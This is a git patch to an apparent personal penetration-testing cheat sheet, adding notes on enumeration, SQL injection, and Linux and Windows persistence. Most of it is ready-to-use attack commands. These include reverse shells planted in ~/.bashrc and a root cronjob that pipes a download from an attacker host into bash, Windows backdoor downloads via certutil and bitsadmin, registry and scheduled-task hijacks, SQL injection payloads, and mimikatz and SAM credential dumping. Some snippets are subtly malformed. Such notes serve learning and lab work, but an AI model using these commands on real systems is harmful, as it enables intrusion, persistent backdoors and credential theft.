From 9623d1008d296124bda738d2b3a2579011495c33 Mon Sep 17 00:00:00 2001 From: whx Date: Wed, 8 Sep 2021 02:09:14 +0200 Subject: [PATCH] bump --- enumeration/docs/ffuf.md | 4 ++ enumeration/docs/nmap.md | 4 ++ .../docs/pwntools_specifics.md | 15 +++++ exploit/python/flask_cookie_decode.py | 36 ++++++++++ exploit/sqli/sqli.md | 36 ++++++++-- .../javascript}/prototype_pollution.md | 0 exploit/web/php/command_injection.md | 10 +++ persistence/bashrc.md | 8 +++ persistence/crontab.md | 15 +++++ persistence/persistence.md | 67 +++++++++++++++++++ pivoting.md | 4 +- post_exploitation/docs/metasploit.md | 14 +++- post_exploitation/docs/powershell.md | 8 +++ reverse_shells/docs/msfvenom.md | 4 ++ 14 files changed, 217 insertions(+), 8 deletions(-) create mode 100644 exploit/buffer_overflow/docs/pwntools_specifics.md create mode 100644 exploit/python/flask_cookie_decode.py rename exploit/{ => web/javascript}/prototype_pollution.md (100%) create mode 100644 exploit/web/php/command_injection.md create mode 100644 persistence/bashrc.md create mode 100644 persistence/crontab.md create mode 100644 persistence/persistence.md create mode 100644 post_exploitation/docs/powershell.md diff --git a/enumeration/docs/ffuf.md b/enumeration/docs/ffuf.md index 7b8001c..42513a5 100644 --- a/enumeration/docs/ffuf.md +++ b/enumeration/docs/ffuf.md @@ -31,6 +31,10 @@ ffuf -u http:///sqli-labs/Less-11/ -c -w /usr/share/seclists/Passwords/Leake ```sh ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt ``` +or if the subdomains are listed in the target's host file +```sh +ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.test.com" -u http:// -fs 0 +``` * Fuzz Vhosts & Server Blocks ```sh ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 0 diff --git a/enumeration/docs/nmap.md b/enumeration/docs/nmap.md index b15bdbc..3333bfb 100644 --- a/enumeration/docs/nmap.md +++ b/enumeration/docs/nmap.md @@ -15,3 +15,7 @@ nmap -oA nmap-vuln -Pn -script vuln -p sudo nmap -oA --nmap-full -sS -sC -sV -p- --defeat-rst-ratelimit searchsploit --nmap ./nmap-full.xml --verbose ``` +## Wordpress Enumeration +```sh +nmap --script http-wordpress-enum --scripts-args check-latest=true,search-limit=1500 -p 80 test.com +``` diff --git a/exploit/buffer_overflow/docs/pwntools_specifics.md b/exploit/buffer_overflow/docs/pwntools_specifics.md new file mode 100644 index 0000000..14bafbb --- /dev/null +++ b/exploit/buffer_overflow/docs/pwntools_specifics.md @@ -0,0 +1,15 @@ +# pwntools + +## Memory Addresses of ELF Binary +* Find address of function and use it on $eip +```python +p = process() +elf = ELF() +__function = elf.symbol. +payload = fit({ + 42: __function # Length measured via cyclic +}) +p.sendline() +proc.interactive() +``` + diff --git a/exploit/python/flask_cookie_decode.py b/exploit/python/flask_cookie_decode.py new file mode 100644 index 0000000..d6f9a49 --- /dev/null +++ b/exploit/python/flask_cookie_decode.py @@ -0,0 +1,36 @@ +import zlib +import sys +import json +from itsdangerous import base64_decode + + +def decode(cookie): + """ + Decode a Flask cookie + + https://www.kirsle.net/wizards/flask-session.cgi + """ + try: + compressed = False + payload = cookie + + if payload.startswith('.'): + compressed = True + payload = payload[1:] + + data = payload.split(".")[0] + + data = base64_decode(data) + if compressed: + data = zlib.decompress(data) + + return data.decode("utf-8") + except Exception as e: + return f"[Decoding error: are you sure this was a Flask session cookie? {e}]" + + +cookie = sys.argv[1] +data = decode(cookie) +json_data = json.loads(data) +pretty = json.dumps(json_data, sort_keys=True, indent=4, separators=(",", ": ")) +print(pretty) diff --git a/exploit/sqli/sqli.md b/exploit/sqli/sqli.md index d1432d3..dac5111 100644 --- a/exploit/sqli/sqli.md +++ b/exploit/sqli/sqli.md @@ -1,33 +1,43 @@ # SQL Injection -# Finding an Opportunity +* [MySQL Comments](https://blog.raw.pm/en/sql-injection-mysql-comment/) + +## Finding an Opportunity * GET parameter ```sh http://example.com/index.php?id=' or 1=1 -- - ``` +* Sometimes an ID or may come first +```sh +http://example.com/index.php?id=10 or 1=1 -- + +http://example.com/index.php?id=10' or '1'='1'-- - +http://example.com/index.php?id=-1' or 1=1 -- -&password=x +``` * Provoke error to gain information ```sh http://example.com/index.php?id=' ``` +* **Incase of client side sanitization craft the URL instead of using the form!!!** -# Usage - +## Usage * Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--` ```sql SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- - SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+ ``` -* Boolean True and False +### Boolean True and False ```sql SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+ SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+ ``` -* Blind injection // Guessing characters +### Blind injection // Guessing characters ```sh http://example.com/?id=1' substr((select database()),1,1)) < 105 --+ ``` +* Function substr(string, start, length) +* sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump` ### Union based * Check number of cols @@ -52,6 +62,13 @@ http://example.com/?id=1' substr((select database()),1,1)) < 105 --+ * [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection) +### Identify Database +```sh +id=sqlite_version() +id=@@version # mysql/mssql +id=(SELECT banner FROM v$version) # oracle +``` + #### SQL Functions * Use sql functions to fumble the tables & cols via union * [source](https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635) @@ -59,6 +76,11 @@ http://example.com/?id=1' substr((select database()),1,1)) < 105 --+ ```sql 1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- - ``` +* sqlite specific +```sql +(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable') +(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%') +``` * Extract cols ```sh 1' and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name ='user'-- - @@ -78,6 +100,10 @@ http://example.com/?id=1' substr((select database()),1,1)) < 105 --+ sqlmap -r request.txt --dbms=mysql --dump sqlmap -r request.txt --batch ``` +* Select form data automatically +```sh +sqlmap -u http:///site.php --forms --dump-all +``` |Parameter|Details| diff --git a/exploit/prototype_pollution.md b/exploit/web/javascript/prototype_pollution.md similarity index 100% rename from exploit/prototype_pollution.md rename to exploit/web/javascript/prototype_pollution.md diff --git a/exploit/web/php/command_injection.md b/exploit/web/php/command_injection.md new file mode 100644 index 0000000..9036825 --- /dev/null +++ b/exploit/web/php/command_injection.md @@ -0,0 +1,10 @@ +# PHP Command Injection +Injecting commands to execute code on the server side via php. + +## Blind Command Injection +Attacker does not register a direct response. + +### Detect Blind Command Injection +Try to save output to URI resource like `output.php` + +## Active Command Injection diff --git a/persistence/bashrc.md b/persistence/bashrc.md new file mode 100644 index 0000000..bcd46a5 --- /dev/null +++ b/persistence/bashrc.md @@ -0,0 +1,8 @@ +# Bashrc Bogus + +## Add Reverse Shell +```sh +echo 'bash -c "bash -i >& /dev/tcp// 0>&1"' >> ~/.bashrc +``` + + diff --git a/persistence/crontab.md b/persistence/crontab.md new file mode 100644 index 0000000..50df63c --- /dev/null +++ b/persistence/crontab.md @@ -0,0 +1,15 @@ +# Cronjobs + +* `crontab -l` +* `cat /etc/crontab` + +## Add Cronjob +* Add line +```sh +* * * * * root curl http://:8000/shell.sh | bash +``` + * Shell content + ```sh + bash -c "bash -i >& /dev/tcp// 0&1" + ``` + diff --git a/persistence/persistence.md b/persistence/persistence.md new file mode 100644 index 0000000..c2f39e0 --- /dev/null +++ b/persistence/persistence.md @@ -0,0 +1,67 @@ +# Persistence + +* Gain through + * Startup folder persistence + * Editing registry keys + * Scheduled tasks + * SUID + * BITS + * Creating a backdoored service + * Creat user + * RDP + +## Gain Persistence on Windows +* Browser. Add to trusted sites. +* Powershell +```sh +Invoke-WebRequest http://:/shell.exe -OutFile .\shell2.exe +``` +* DOSprompt +```cmd +certutil -urlcache -split -f http://:\AppData\Roaming\backdoor.exe" +``` +### Background Intelligence Transfer Service (BITS) +```sh +bitsadmin /create __shell__ +bitsadmin /addfile __shell__ "http://:/shell2.exe" "C:\Users\\Documents\shell2.exe" +``` +```sh +bitsadmin /SetNotifyCmdLine 1 cmd.exe "/c shell2.exe /complete __shell__ | start /B C:\Users\\Documents\shell2.exe" +bitsadmin /SetMinRetryDelay 30 +bitsadmin /resume +``` + +## High Priv +* Create user `net user /add ` +* Add to admin group via `net localgroup Administrator /add` +* Check `net localgroup Administrator` + +### Add to registry +* Execute on user logon via +```sh +reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f +``` +### Add a Service +* Inside meterpreter `load powershell` and `powershell_shell` +```sh +New-Service -Name "" -BinaryPathName "" -Description "" -StartupType "Boot" +``` +### Add Scheduled Task +```sh +$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C"\Users\Administrator\Documents\rshell.exe +$B = New-ScheduledTaskTrigger -AtLogOn +$C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY/SYSTEM" -RunLevel Highest +$D = New-ScheduledTaskSettingsSet +$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D +Register-ScheduledTask ReverseShell -InputObject $E +``` diff --git a/pivoting.md b/pivoting.md index b58c3e7..b7fa757 100644 --- a/pivoting.md +++ b/pivoting.md @@ -21,9 +21,10 @@ for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo ## Tools ### Enumerating a network using native and statically compiled tools ### Proxychains / FoxyProxy -* Proxychains +* Proxychains, e.g. scan target via nmap, or connect via nc thorugh jump server ```sh proxychains nc + proychains nmap ``` * Use `/etc/proxychains.conf` or `./proxychains.conf`containing: ``` @@ -32,6 +33,7 @@ for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo # meanwhile # defaults set to "tor" socks4 127.0.0.1 9050 + #socks5 127.0.0.1 1337 # proxy_dns ``` * FoxyProxy diff --git a/post_exploitation/docs/metasploit.md b/post_exploitation/docs/metasploit.md index 80e6861..414fb9d 100644 --- a/post_exploitation/docs/metasploit.md +++ b/post_exploitation/docs/metasploit.md @@ -26,15 +26,25 @@ use ``` * Fill options like `session` and run the exploit -### Privilige Escalation on Windows Using Metasploit +### Privilege Escalation on Windows Using Metasploit * Find process with higher privs and migrate to it. Example `spoolsv.exe`. ```sh migrate -N spoolsv.exe ``` - * After `NT AUTHORITY\SYSTEM` is gained start mimikatz. and dump all creds +* After `NT AUTHORITY\SYSTEM` is gained start mimikatz. and dump all creds ```sh load kiwi help creds_all ``` * Enable RDP via `run post/windows/manage/enable_rdp` + +### Hashdump on Windows +* Meterpreter +```sh +run post/windows/gather/hashdump +``` +```sh +load kiwi +lsa_dump_sam +``` diff --git a/post_exploitation/docs/powershell.md b/post_exploitation/docs/powershell.md new file mode 100644 index 0000000..7d0def6 --- /dev/null +++ b/post_exploitation/docs/powershell.md @@ -0,0 +1,8 @@ +# Powershell + +## HashDump +```sh +save HKLM\SAM C:\Users\Administrator\Desktop\SAM +save HKLM\SAM C:\Users\Administrator\Desktop\System +``` +* Use `samdump2` diff --git a/reverse_shells/docs/msfvenom.md b/reverse_shells/docs/msfvenom.md index 1b78e43..6c0a5e4 100644 --- a/reverse_shells/docs/msfvenom.md +++ b/reverse_shells/docs/msfvenom.md @@ -37,6 +37,10 @@ or ``` powershell -c "Invoke-WebRequest -Uri 'ip/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'" ``` +or on cmd.exe +```sh +certutil -urlcache -split -f http://:/shell.exe +``` ## Unix ### netcat reverse